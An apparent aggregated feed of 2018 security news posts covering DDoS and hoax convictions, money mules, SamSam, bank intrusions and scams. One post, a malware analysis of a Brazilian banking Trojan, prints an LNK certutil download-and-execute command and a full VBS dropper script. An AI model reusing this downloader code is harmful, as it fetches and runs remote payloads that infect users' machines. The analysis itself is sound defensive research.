The British teenager George Duke-Cohan (19) has been sentenced to three years in prison due to false bomb threats and carrying out DDoS attacks.A

Cohan was arrested in August by the U.K. National Crime Agency (NCA), the teenager, aka “7R1D3N7,” “DoubleParallax” and “optcz1,” was arrested on August 31 and pleaded guilty to three counts of making hoax bomb threats.

According to the investigator, the young man is the leader of the Apophis Squad, which is the hacking group that sent bomb threats to thousands of schools in the United Kingdom and the United States.

The group is also known for launching massive DDoS attacks against encrypted email provider ProtonMail, the popular investigator Brian Krebs, the DEF CON hacking conference, and government agencies worldwide.

The team was offering a DDoS-for-hire service that has many similarities with the booter implemented by the popular Lizard Squad hacking crew.

He has admitted making bomb threats to thousands of schools and a United Airlines flight traveling from the UK to San Francisco in August. in many cases resulting in evacuations. 
The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

Cohan has now been sentenced to one year in prison for the bomb hoaxes targeting schools, and two years for the airport attack.

Unfortunately for the British youngster, he will face additional charges in the United States, even if the indictment has yet to be announced.

Before sentencing, the judge noted that Duke-Cohan’s early guilty pleas, his age, no prior criminal record and, to a limited extent, his “functioning deficiencies which have contributed to a diagnosis of autism,” were taken into consideration. However, these mitigating factors only helped his case to a certain degree.

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow.” said Judge Richard Foster

“You were playing a cat-and-mouse game with the authorities. You were playing a game for your own perverted sense of fun in full knowledge of the consequences.”

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow,” Judge Richard Foster said, quoted by the Daily Mail. “What you did was far removed from anything that could be described as naivety or a cry for help from a sick person.”

Pierluigi Paganini

(Security Affairs – cybercrime, DDoS)

The post Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS appeared first on Security Affairs.



Security Affairs

Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS

The British teenager George Duke-Cohan (19) has been sentenced to three years in prison due to false bomb threats and carrying out DDoS attacks.A

Cohan was arrested in August by the U.K. National Crime Agency (NCA), the teenager, aka “7R1D3N7,” “DoubleParallax” and “optcz1,” was arrested on August 31 and pleaded guilty to three counts of making hoax bomb threats.

According to the investigator, the young man is the leader of the Apophis Squad, which is the hacking group that sent bomb threats to thousands of schools in the United Kingdom and the United States.

The group is also known for launching massive DDoS attacks against encrypted email provider ProtonMail, the popular investigator Brian Krebs, the DEF CON hacking conference, and government agencies worldwide.

The team was offering a DDoS-for-hire service that has many similarities with the booter implemented by the popular Lizard Squad hacking crew.

He has admitted making bomb threats to thousands of schools and a United Airlines flight traveling from the UK to San Francisco in August. in many cases resulting in evacuations. 
The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

Cohan has now been sentenced to one year in prison for the bomb hoaxes targeting schools, and two years for the airport attack.

Unfortunately for the British youngster, he will face additional charges in the United States, even if the indictment has yet to be announced.

Before sentencing, the judge noted that Duke-Cohan’s early guilty pleas, his age, no prior criminal record and, to a limited extent, his “functioning deficiencies which have contributed to a diagnosis of autism,” were taken into consideration. However, these mitigating factors only helped his case to a certain degree.

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow.” said Judge Richard Foster

“You were playing a cat-and-mouse game with the authorities. You were playing a game for your own perverted sense of fun in full knowledge of the consequences.”

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow,” Judge Richard Foster said, quoted by the Daily Mail. “What you did was far removed from anything that could be described as naivety or a cry for help from a sick person.”

Pierluigi Paganini

(Security Affairs – cybercrime, DDoS)

The post Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS appeared first on Security Affairs.

The Simpler the Better? Looking Deeper Into the Malware Used in Brazilian Financial Cybercrime

In the first article of this two-part series, we covered recent infection and fraud tactics, techniques and procedures (TTPs) used against Brazilian internet users. In this second post, we’ll cover the analysis of a popular remote overlay Trojan used by financial cybercrime actors in Brazil.

Remote overlay malware is quite prolific and generic, and although it happens now and then, it is generally rare to find financial malware in Brazil that could be deemed special or sophisticated. So what’s special about this particular variant? To begin, the dynamic link library (DLL) hijacking technique is not very common, although we have seen it before in Brazil. More interestingly, it seems that the malware’s operators are no longer focused on banks alone; they are now also interested in stealing users’ cryptocurrency exchange accounts, which ties in well with the growing appetite financial cybercrime has for cryptocurrency in Brazil.

Compromising Brazilian Users One Remote Session at a Time

IBM X-Force research follows the Brazilian threat landscape on an ongoing basis. In recent analyses, our team observed a new malware variant from the remote overlay family infecting users in the region.

Remote overlay Trojans are very common among Brazilian fraudsters who target local users. A recent generic variant we analyzed is able to remotely control infected devices using a DLL hijacking technique to load its malicious code into a legitimate binary file of a free antivirus program.

The malicious DLL, which is written in the Delphi programming language typical of Brazilian malware, contains overlay images that the malware plasters over the screen after an infected user authenticates an online banking session. The screens are made to match the look and feel of the victim’s bank and trick victims into providing personal information and two-factor authentication (2FA) elements.

Read the white paper: Preserving trust in digital financial services

Rising Interest in Cryptocurrency

Cryptocurrency trading accounts are becoming more popular than traditional brokerage accounts in Brazil — a trend that local fraudsters are likely familiar with and poised to exploit.

Variants we analyzed in recent campaigns against the major banks in Brazil also targeted cryptocurrency exchange platforms. The attack method is similar to how banks are targeted: by stealing the user’s account credentials, taking over their account and transferring their money to the criminals’ accounts.

A Typical Infection Routine

A look into the infection routine of this remote overlay Trojan shows that the initial compromise happens when a potential victim is lured into downloading what he or she believes to be an official invoice. The file is an archive that harbors the malicious scripts that will ultimately infect the device. Below is a summary of the typical infection tactic:

  1. The victim uses a search engine to find his or her provider’s website and pay a monthly invoice. Instead of the genuine website, the first result is a malicious page that attackers have boosted with paid efforts. The victim accesses that page and keys in his or her identification details to fetch the invoice.
  2. The victim unknowingly downloads a malicious LNK file — a Windows shortcut file — archived inside a ZIP file purporting to be from DETRAN, the ministry of transportation in Brazil.
  3. The LNK file contains a command that will download a malicious Visual Basic (VBS) script from a remote server and run it with a legitimate Windows program, certutil.
  4. The malicious VBS script downloads an additional ZIP file from the attacker’s remote server, this time containing the malware’s malicious DLL payload as well as a legitimate binary file of a free antivirus program it will use to hide the DLL.
  5. The VBS script executes the malware, infecting the device.
  6. Once deployed, the Trojan uses a DLL hijacking technique to load its malicious DLL into the legitimate binary of the antivirus program. This roundabout infection routine helps the malware evade detection by security controls.
  7. After completing the installation, the malware monitors the victim’s browser and goes into action when the victim navigates to a targeted online banking website or cryptocurrency exchange platform.
  8. The malicious DLL component gives the malware its remote control capabilities.

Zooming In on the Malicious LNK File

A closer look at the LNK file reveals the way it abuses certutil, which is installed as part of Certificate Services.

First, the malicious script is downloaded from the remote server under the name “tudodebom”:

“C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f “https://remoteserver/turbulencianoar/tudodebom.txt” %temp%\tudodebom.txt && cd %temp% && rename “tudodebom.txt
  • -urlcache displays or deletes URL cache entries.
  • -split -f forces fetching of a specific URL and updating of the cache.

Once retrieved, the malware changes the file’s name and extension from “tudodebom.txt” to “JNSzlEYAIubkggX.vbs”:

“JNSzlEYAIubkggX.vbs” && C:\windows\system32\cmd.exe /k JNSzlEYAIubkggX.vbs

The LNK file invokes the Windows command line (CMD) and executes certutil.exe to download a TXT file (.vbs) from a remote host:

hXXps://remoteserver/turbulencianoar/tudodebom.txt

Lastly, the malware executes the malicious VBS script.

Examining the VBS Script

The VBS script downloads the ZIP archive containing the malware payload. It then deploys it on the victim’s device in a directory with the following naming pattern:

“C:\AV product_” + RandomName + “\”

After that process is complete, the script executes the legitimate, but poisoned, binary that will load the malicious DLL and start a connection to the attacker’s command and control (C&C) server.

Interesting elements in this routine include:

  • The use of legitimate remote servers to host attack tools;
  • The abuse of a legitimate binary from an existing antivirus program to hide the malware’s DLL; and
  • The naming convention of the malware, which can make the malware easier to detect and quarantine on infected devices.

Upon analyzing the malware, we found the VBS script that the Trojan uses to deploy its malicious DLL to contain the following:

Dim ubase, randname, exerandom, deffolder, filesuccess, filezip, fileexe, filedll

Set objShell = CreateObject( “WScript.Shell” )

ubase = “https://remoteserver/turbulencianoar/AuZwaaU.zip”

randname = getrandomstring()

exerandom = “AV product.SystrayStartTrigger-” + randname

filezip = “AuZwaaU.zip”

deffolder = “C:\AV product_” + randname + “\”

filesuccess = objShell.ExpandEnvironmentStrings(“%TEMP%”) + “\java_install.log”

fileexe = “AuZwaaU.exe”

filedll = “AuZwaaU.sys”

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

If (objFSO.FileExists(filesuccess)) Then

WScript.Quit

End If

If not (objFSO.FileExists(filezip)) Then

Set objFile = objFSO.CreateTextFile(filesuccess, True)

objFile.Write ” ”

objFile.Close

‘WScript.Echo msg

dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)

dim bStrm: Set bStrm = createobject(“Adodb.Stream”)

xHttp.Open “GET”, ubase, False

xHttp.Send

with bStrm

.type = 1

.open

.write xHttp.responseBody

.savetofile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip, 2

end with

WScript.Sleep 5000

set objShellApp = CreateObject(“Shell.Application”)

set FilesInZip=objShellApp.NameSpace(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip).items

objShellApp.NameSpace(objShell.ExpandEnvironmentStrings(“%TEMP%”)).CopyHere(FilesInZip)

WScript.Sleep 5000

objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip

objFSO.CreateFolder deffolder

WScript.Sleep 3000

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & fileexe, deffolder & exerandom & “.exe”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filedll, deffolder & “AV product.OE.NativeCore.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcp120.sys”, deffolder & “msvcp120.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcr120.sys”, deffolder & “msvcr120.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\LOG”, deffolder & “LOG”

WScript.Sleep 5000

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

Set objShell = CreateObject( “WScript.Shell” )

outFile = objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”

Set objFile = objFSO.CreateTextFile(outFile,True)

objFile.Write “@echo off” & vbCrLf

objFile.Write “@cd ” & deffolder & vbCrLf

objFile.Write “start ” & exerandom & “.exe” & vbCrLf

objFile.Close

objShell.Exec(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”)

WScript.Sleep 10000

objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”

Set objShell = Nothing

Set objFSO = Nothing

Set objShellApp = Nothing

End If

Function getrandomstring()

Dim intMax, k, intValue, strChar, strName

Const Chars = “abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”

intMax = 6

Randomize()

strName = “”

For k = 1 To intMax

intValue = Fix(62 * Rnd())

strChar = Mid(Chars, intValue + 1, 1)

Randomize()

intValue = Fix(62 * Rnd())

strChar = strChar & Mid(Chars, intValue + 1, 1)

strName = strName & strChar

If (k < 6) Then

strName = strName & “”

End If

Next

getrandomstring = strName

End Function

Remote Overlay Images

Last but not least, the overlay images the malware hosts are no longer exclusive to banks. Our analysis shows that fraudsters in Brazil are just as interested in robbing users of their cryptocurrency.

To accomplish this goal, the threat actors have created a number of overlays to match platforms used in Brazil (we have censored the platform’s logo below). In each case, the attackers prompt the user to verify his or her email address and identity and confirms the user’s security with a fresh one-time password from their tokenization method.

Brazilian remote overlay Trojan

Figure 1: Fake overlay screen asks users to provide information about their identity.

Remote Overlay Brazilian Malware is after cryptocurrency

Figure 2: Fake overlay screen asks users to submit a token code.

Overlays for 2FA requests match the targeted platform’s preference of user authentication elements and include single sign-on (SSO) from email and social accounts:

Brazilian Remote Overlay Malware Asks for SSO

Figure 3: Fake overlay screen asks infected users to use SSO authentication from their webmail/social accounts.

Mitigate Financial Cybercrime Risks

Malware in Brazil is one of the most prolific tactics used by cybercriminals to defraud internet users. Although infection rates can be high for campaigns due to the large number of users affected by each attack, the risks can be mitigated with continued user education and by placing the right controls on user devices to help protect against malware.

Read the white paper: Preserving trust in digital financial services


The post The Simpler the Better? Looking Deeper Into the Malware Used in Brazilian Financial Cybercrime appeared first on Security Intelligence.

Europol identified 1504 money mules under EMMA 4 operation

Europol announced the arrest of 168 people under the 
European Money Mule Action ‘EMMA 4′, a massive operation that resulted in the identification of 1,504 money mules. 

Europol announced that 168 people have been arrested under the ‘EMMA 4’, an international operation conducted by law enforcement. EMMA 4 lasted from September to November 2018. Law enforcement in 30 states identified 140 money mule organizers. 

Europol opened 837 criminal investigations, many of which are still ongoing, law enforcement arrested people in 20 states, 
The operation sees the participation of Europol, Eurojust, the European Banking Federation, and law enforcement from Austria, Belgium, Bulgaria, Croatia, Czech Republic, Denmark, Estonia, Finland, France, Greece, Germany, Hungary, Ireland, Italy, Latvia, Lithuania, Malta, Netherlands, Poland, Portugal, Romania, Slovenia, Spain, Sweden, Australia, Moldova, Norway, Switzerland, the United Kingdom and the United States.

The operation aimed at dismantling money laundering activities, in particular tackling ‘money mules’ rings that have e crucial role in the criminal activity. Global and European banks provided an essential support to the EMMA 4, Europol reported the participation of over 300 banks, 20 bank associations, and other financial institutions. The financial organization helped reporting 26,376 fraudulent money mule transactions, preventing a total loss of €36.1 million ($41.1 million). 

Money mules are essential for cash out of criminal activities and transfer stolen funds between accounts used to launder the money.

“Money mules are individuals who, often unwittingly, have been recruited by criminal organisations as money laundering agents to hide the origin of ill-gotten money.” reads the press release published by Europol.

“Tricked by the promise of easy money, mules transfer stolen funds between accounts, often in different States, on behalf of others and are usually offered a share of the funds that pass through their own accounts.”

Criminal organizations use to choose money moles among newcomers to a country or people who are unemployed or in economic distress. Unfortunately, the number of young people recruited as money mules is increasing, criminals are reaching them through social media, advertisement of fake jobs or get-rich-quick posts.

Youngsters have no perception of the crime they are carrying out transferring funds from an account to another.

“To raise awareness of this type of fraud, the money muling awareness campaign #DontBeAMule kicks off today across Europe. With awareness-raising material, available for download in 25 languages, the campaign will inform the public about how these criminals operate, how they can protect themselves and what to do if they become a victim.” concludes the press release.

“For the next week, international partners from law enforcement and judicial authorities, together with financial institutions, will be supporting the campaign at national level.”

Pierluigi Paganini

(Security Affairs –money mules, EMMA 4)

The post Europol identified 1504 money mules under EMMA 4 operation appeared first on Security Affairs.

Banks Attacked through Malicious Hardware Connected to the Local Network

Kaspersky is reporting on a series of bank hacks -- called DarkVishnya -- perpetrated through malicious hardware being surreptitiously installed into the target network:

In 2017-2018, Kaspersky Lab specialists were invited to research a series of cybertheft incidents. Each attack had a common springboard: an unknown device directly connected to the company's local network. In some cases, it was the central office, in others a regional office, sometimes located in another country. At least eight banks in Eastern Europe were the targets of the attacks (collectively nicknamed DarkVishnya), which caused damage estimated in the tens of millions of dollars.

Each attack can be divided into several identical stages. At the first stage, a cybercriminal entered the organization's building under the guise of a courier, job seeker, etc., and connected a device to the local network, for example, in one of the meeting rooms. Where possible, the device was hidden or blended into the surroundings, so as not to arouse suspicion.

The devices used in the DarkVishnya attacks varied in accordance with the cybercriminals' abilities and personal preferences. In the cases we researched, it was one of three tools:

  • netbook or inexpensive laptop
  • Raspberry Pi computer
  • Bash Bunny, a special tool for carrying out USB attacks

Inside the local network, the device appeared as an unknown computer, an external flash drive, or even a keyboard. Combined with the fact that Bash Bunny is comparable in size to a USB flash drive, this seriously complicated the search for the entry point. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem.

Slashdot thread.

Half of management teams lack awareness about BPC despite increased attacks

Trend Micro revealed that 43 percent of surveyed organizations have been impacted by a Business Process Compromise (BPC). Despite a high incidence of these types of attacks, 50 percent of management teams still don’t know what these attacks are or how their business would be impacted if they were victimized. Most popular filename categories used in malicious attachments (based on VirusTotal samples) In a BPC attack, criminals look for loopholes in business processes, vulnerable systems … More

The post Half of management teams lack awareness about BPC despite increased attacks appeared first on Help Net Security.

Attention Red Dead Redemption 2 Players: Dodge This New Download Scam

Rockstar Games’ Red Dead Redemption 2 has struck a popular chord with many online gamers. Unfortunately, the Western-themed action-adventure game has also become a popular vessel for malicious activity among cybercriminals as well. Scammers are tricking gamers into giving up their personal information with phony “free” downloads of the online game, while simultaneously making a profit on these downloads.

You’re probably wondering how exactly this scam works. It first begins with cybercriminals planting their phony download traps in ads on platforms like YouTube, Twitter, and blog postings. With other, less sophisticated scams, a user would be prompted to install several bundled applications at this point, each one generating revenue for the scammer. But this scheme works a little bit differently. When the user clicks on the “download” button, they are presented with a fake install screen showing the progression of the game’s download process.  The fake install takes about an hour to complete, further giving the illusion that a large file is actually being downloaded on the user’s device.

Once the fake installation is complete, the user is asked to enter a nonexistent license key (a pattern of numbers and/or letters provided to licensed users of a software program). If a user clicks on one of the buttons on this screen, they are redirected to a website asking for human verification in the form of surveys and questionnaires. These surveys trick the user into divulging their personal information for the cybercriminal’s disposal. What’s more, the scammer earns revenue for their malicious acts.

Because this scheme tricks users into handing over their personal information, it affects a victim’s overall privacy. Luckily, there are steps users can take to combat this threat:

  • Browse with caution. Many scammers target gamers through popular websites like YouTube and Twitter to push out malicious content. Use discretion when browsing these websites.
  • Only download content from trusted sources. If you come across a download offer that seems too good to be true, it probably is. Only download software from legitimate sources and avoid sites if you can’t tell whether they are trustworthy or not.
  • Use security software to browse the internet. Sometimes, it can be hard to distinguish whether a site is malicious or not. Security solutions like McAfee WebAdvisor can detect the URLs and scam installers associated with this threat.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention Red Dead Redemption 2 Players: Dodge This New Download Scam appeared first on McAfee Blogs.

DHS and FBI published a joint alert on SamSam Ransomware

The US Department of Homeland Security (DHS) and the FBI issued a joint alert on SamSam attacks targeting critical infrastructure.

The US Department of Homeland Security (DHS) and the FBI published a joint alert on the activity associated with the infamous SamSam ransomware.

The SamSam hackers extorted over 200 organizations, including public institutions, municipalities, and hospitals, they have caused over $30 million in losses.

In March 2018, computer systems in the City of Atlanta were infected by ransomware, the cyber attack was confirmed by the City officials.

The ransomware infection has caused the interruption of several city’s online services, including “various internal and customer-facing applications” used to pay bills or access court-related information.

One of the latest attacks hit the port of San Diego in September,  the incident impacted the processing park permits and record requests, along with other operations.

In February, SamSam ransomware infected over 2,000 computers at the Colorado Department of Transportation (DOT), the DOT has shut down the infected workstations.

In August, Sophos security firm published a report the SamSam ransomware, its experts tracked Bitcoin addresses managed by the crime gang and discovered that crooks had extorted nearly $6 million from the victims since December 2015 when it appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015.
74% of the known victims are based in the United States. Other regions known to have
suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a
significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million, the security firm also estimated that the group is netting around $300,000 per month.

A few days ago, the U.S. DoJ charged two Iranian men, Faramarz Shahi Savandi (34) and Mohammad Mehdi Shah Mansouri (27), over their alleged role in creating and spreading the infamous SamSam ransomware.

According to the joint report, most of the victims were located in the United States.

“The SamSam actors targeted multiple industries, including some within critical infrastructure. Victims were located predominately in the United States, but also internationally.” reads the alert.

“Network-wide infections against organizations are far more likely to garner large ransom payments than infections of individual systems. Organizations that provide essential functions have a critical need to resume operations quickly and are more likely to pay larger ransoms.”

SamSam actors leverage vulnerabilities in Windows servers to gain persistent access to the target network and make lateral movements to infect other hosts on the network.

According to the report, attackers used the JexBoss Exploit Kit to compromise JBoss applications. Threat actors use Remote Desktop Protocol (RDP) to gain persistent access to victims’ networks, they use brute force attacks and stolen login credentials.

After obtaining access to the victim’s network, attackers escalate privileges then they drop and execute the malware.

“After gaining access to a particular network, the SamSam actors escalate privileges for administrator rights, drop malware onto the server, and run an executable file, all without victims’ action or authorization. While many ransomware campaigns rely on a victim completing an action, such as opening an email or visiting a compromised website, RDP allows cyber actors to infect victims with minimal detection.” continues the alert.

According to the experts, attackers used stolen RDP credentials that were bought from darknet marketplaces. and used in attacks within hours of purchasing the credentials.

The alert also technical details and the following recommendations to mitigate the threat:

  • Audit your network for systems that use RDP for remote communication. Disable the service if unneeded or install available patches. Users may need to work with their technology venders to confirm that patches will not affect system processes.
  • Verify that all cloud-based virtual machine instances with public IPs have no open RDP ports, especially port 3389, unless there is a valid business reason to keep open RDP ports. Place any system with an open RDP port behind a firewall and require users to use a virtual private network (VPN) to access that system.
  • Enable strong passwords and account lockout policies to defend against brute force attacks.
  • Where possible, apply two-factor authentication.
  • Regularly apply system and software updates.
  • Maintain a good back-up strategy.
  • Enable logging and ensure that logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.
  • When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access.
  • Ensure that third parties that require RDP access follow internal policies on remote access.
  • Minimize network exposure for all control system devices. Where possible, disable RDP on critical devices.
  • Regulate and limit external-to-internal RDP connections. When external access to internal resources is required, use secure methods such as VPNs. Of course, VPNs are only as secure as the connected devices.
  • Restrict users’ ability (permissions) to install and run unwanted software applications.
  • Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.

Pierluigi Paganini

(Security Affairs – SamSam ransomware, hacking)

The post DHS and FBI published a joint alert on SamSam Ransomware appeared first on Security Affairs.

House GOP Campaign Arm Targeted by ‘Unknown Entity’ in 2018

Thousands of emails were stolen from aides to the National Republican Congressional Committee during the 2018 midterm campaign, a major breach exposing vulnerabilities that have kept cybersecurity experts on edge since the 2016 presidential race.

read more

Humble Bundle alerts customers to subscription reveal bug

You’ll want to check your mailbox if you have a Humble Bundle account, as they’re notifying some customers of a bug used to gather subscriber information.

bug notice

Click to enlarge

The mail reads as follows:

Hello,

Last week, we discovered someone using a bug in our code to access limited non-personal information about Humble Bundle accounts. The bug did not expose email addresses, but the person exploited it by testing a list of email addresses to see if they matched a Humble Bundle account. Your email address was one of the matches.

Now, this is the part of a breach/bug mail where you tend to say “Oh no, not again” and take a deep breath. Then you see how much of your personal information winged its way to the attacker.

Oh no, not again

For once, your name, address, and even your login details are apparently in safe hands. Either this bug didn’t expose as much as the attacker was hoping for, or they were just in it for the niche content collection.

The email continues:

Sensitive information such as your name, billing address, password, and payment information was NOT exposed. The only information they could have accessed is your Humble Monthly subscription status. More specifically, they might know if your subscription is active, inactive, or paused; when your plan expires; and if you’ve received any referral bonuses.

I should explain at this point. You can buy standalone PC games on the Humble store, or whatever book, game, or other collection happen to be on offer this week. Alternatively, you can sign up to the monthly subscription. With this, you pay and then every month you’re given a random selection of video game titles. They may be good, bad, or indifferent. You might already own a few, in which case you may be able to gift them to others. If you have  no interest in the upfront preview titles, you can temporarily pause your subscription for a month.

This is the data that the bug exploiter has obtained, which is definitely an odd and specific thing to try and grab.

Security advice from Humble Bundle

Let’s go back to the email at this point:

Even though the information revealed is very limited, we take customer trust very seriously and wanted to promptly disclose this to you. We want to make sure you are able to protect yourself should someone use the information gathered to pose as Humble Bundle.

As a reminder, here are some tips to keep your account private and safe:

  • Don’t share your password, personal details, or payment information with anyone. We will NEVER ask for information like that.
  • Be careful of emails with links to unfamiliar sites. If you receive a suspicious email related to Humble Bundle, please contact us via our support website so that we can investigate further and warn others.
  • Enable Two-factor authentication (2FA) so that even if someone gets your password, they won’t be able to access your account. You can enable2FA by following these instructions.

We sincerely apologize for this mistake. We will work even harder to ensure your privacy and safety in the future.

Good advice, but what’s the threat?

One could guess that the big risk here, then, is the potential for spear phishing. They could exploit this by sending mails to subscribers that their subscription is about to time out, or claim problems with stored card details. Throw in a splash of colour text regarding your subscription “currently being paused,” and it’s all going to look convincing.

Phishing is a major danger online, and we should do everything we can to thwart it. While the information exposed here isn’t as bad as it tends to be, it can still cause major headaches. Be on the lookout for dubious Humble mails, especially if they mention subscriptions. It’ll help to keep your bundle of joy from becoming a bundle of misery.

The post Humble Bundle alerts customers to subscription reveal bug appeared first on Malwarebytes Labs.

Achieve Community Immunity With Security Data Integration

Security is a team sport. Both threat actors and cybersecurity professionals are teaming up and collaborating in greater numbers than ever. In fact, a United Nations study found that crime rings that regularly share information drive around 80 percent of cyberattacks. The dark web has become the standard platform to share security data, as well as an effective marketplace to monetize cybercrime activities.

On the defensive side, mature security programs are developing approaches to integrate different teams. According to The New York Times, some companies are even building fusion centers where employees from a range of backgrounds — from fraud detection to forensic analysis to customer service — work together to fight threats. Motivated by the demand from customers, IBM Security built a cyber range and a mobile Cyber Tactical Operations Center (C-TOC) to help battle-test security teams with crisis simulations.

How Can Cybersecurity Professionals Foster More Collaboration?

While many organizations are using the Department of Homeland Security (DHS)’s fusion centers as a model to foster collaboration among teams, the vast majority of companies are facing a skills shortage. According to ISACA, 27 percent of U.S. enterprises are unable to fill open roles for cybersecurity professionals. Given this challenge, how can enterprises promote collaboration and, more importantly, use it to drive better security outcomes?

When considering how to prevent cybercrime, it’s critical to break down barriers to collaboration. It’s time for us to learn from each other, and not reinvent the wheel when it is already working for someone else. We must use the spirit of community to inoculate ourselves against threats and gain long-term immunity. The human race has conquered many deadly diseases, such as smallpox and polio, through community immunity — so why not bring this concept to cybersecurity?

Here are three ways to foster collaboration among teams and achieve community immunity with the help of a security data integration platform:

1. Gain a Global Perspective

We should be able to leverage insights from our peers to enrich our own decision-making. One way to do this is by using a threat score or another normalized method of sharing threat intelligence. Threat sharing should always be anonymous to protect the privacy and security of enterprises and individuals. Threat intelligence should also be specific, whether at the regional or industry level, to make it relevant and actionable.

2. Reduce Blind Spots

Threat intelligence is just one part of security. Analysts need visibility into many other areas, such as database vulnerabilities and fraud analytics. Having a single, collaborative platform to share this security data allows other analysts and researchers to build on and refine the information and, in turn, share improved data with the security community.

3. Generate Personalized Recommendations

The power of global analytics is in leveraging the learnings from a broader environment and making them relevant to us. We often see this approach in retail, where websites recommend a product based on your purchase history or user profile. In security, a recommendation engine that proactively surfaces improvements to your existing program or tips to fine-tune your deployments can be incredibly useful. In addition, as customers move toward purchasing micro-apps and services and when they need them, a recommendation engine can proactively suggest solutions so analysts can stay ahead of threats and leverage the latest innovations available to them.

Don’t Go It Alone

So, how will you build your team? If anything is certain about today’s evolving cyberthreat landscape, it’s that you can’t go it alone. By fostering relationships with peers, improving visibility into databases and vulnerabilities, and investing in systems that generate personalized recommendations, security leaders can launch a more coordinated and collaborative counterattack in the ongoing battle against cybercrime.

The post Achieve Community Immunity With Security Data Integration appeared first on Security Intelligence.

Pay-Per-Install Company Deceptively Floods Market with Unwanted Programs

For the past 18 months, McAfee Labs has been investigating a pay-per-install developer, WakeNet AB, responsible for spreading prevalent adware such as Adware-Wajam and Linkury. This developer has been active for almost 20 years and recently has used increasingly deceptive techniques to convince users to execute its installers. Our report is now available online.

During a 10-month period from September 2017 to June 2018, we observed more than 1.9 million detections in the wild and the generation of thousands of unique websites and URLs. McAfee product protections prevented millions of pieces of adware from being installed on customers’ machines.

 

McAfee Adware-InstCap detections from September 2017 to June 2018.

Some of the deceptive tactics we observed included fake movie playbacks and fake torrent downloads targeting both Windows and Mac systems. These tactics aimed to trick users into installing bundled applications such as performance cleaners.

WakeNet AB’s FileCapital tools are responsible for installing some of the most prevalent potentially unwanted program (PUP) families, which plague infected clients with unwanted advertisements and seriously impact performance.

The revenue WakeNet AB generated in one year puts it above some of the most prevalent ransomware families, which explains why creating PUPs is so appealing. PUP developers generate revenue primarily by exploiting PC users.

PUPs

A PUP is software that might offer some useful functionality to a customer but also presents some risk. Users see some PUPs as benign, others as malicious. One of the latter is Adware-Elex (aka Fireball), which infected 250 million devices. McAfee strives to protect its customers against all kinds of threats, including PUPs.

The McAfee PUP Policy helps users understand what is being installed on their systems and notifies them when a technology poses a risk to their systems or privacy. PUP detection and removal provides notification to our customers when a software program or technology lacks sufficient notification or control over the software, or fails to adequately gain user consent to the risks posed by the technology. For more on how McAfee defines and protects against PUPs, read the McAfee® Potentially Unwanted Programs Policy.

For a full analysis of WakeNet AB’s products, download the full report.

The post Pay-Per-Install Company Deceptively Floods Market with Unwanted Programs appeared first on McAfee Blogs.

Sharp rise in email and social media hacking in the UK

Police forces across the UK are coming under increasing pressure to launch criminal investigations into incidents of social media and computer hacking, according to a new report from the Parliament Street think tank. The news comes as senior Police Chiefs have warned that budget cuts and limited resources are leading to an increase in violent crime across the country. The new research paper, reveals that 14 police forces have launched a total of 2,547 investigations … More

The post Sharp rise in email and social media hacking in the UK appeared first on Help Net Security.

Kaspersky Security Bulletin 2018. Top security stories

Introduction

The internet is now woven into the fabric of our lives. Many people routinely bank, shop and socialize online and the internet is the lifeblood of commercial organizations. The dependence on technology of governments, businesses and consumers provides a broad attack surface for attackers with all kinds of motives – financial theft, theft of data, disruption, damage, reputational damage or simply ‘for the lulz’. The result is a threat landscape that ranges from highly sophisticated targeted attacks to opportunistic cybercrime. All too often, both rely on manipulating human psychology as a way of compromising entire systems or individual computers. Increasingly, the devices targeted also include those that we don’t consider to be computers – from children’s toys to security cameras. Here is our annual round-up of major incidents and key trends from 2018

Targeted attack campaigns

